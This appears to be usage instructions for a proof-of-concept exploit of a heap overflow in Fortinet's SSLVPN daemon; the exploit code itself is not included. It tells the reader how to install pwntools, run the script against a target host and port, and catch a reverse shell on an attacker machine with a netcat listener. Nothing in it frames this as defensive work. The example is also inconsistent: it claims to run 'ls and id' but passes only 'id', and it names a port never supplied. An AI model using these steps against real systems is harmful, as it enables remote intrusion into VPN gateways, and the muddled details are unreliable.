POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon
pip install pwntools To use this code, you can save it in a file, say exploit.py, and then run it with Python in the command line, passing in the required arguments. Here's an example command to run the exploit
python exploit.py <target_host> <target_port> <reverse_ip>
Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine you want to receive a shell on. The remaining arguments are the commands that you want to execute, separated by spaces.
For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that you will need to have a listener running on the specified IP address and port to receive the reverse shell. You can use tools like ncat or netcat to create a listener.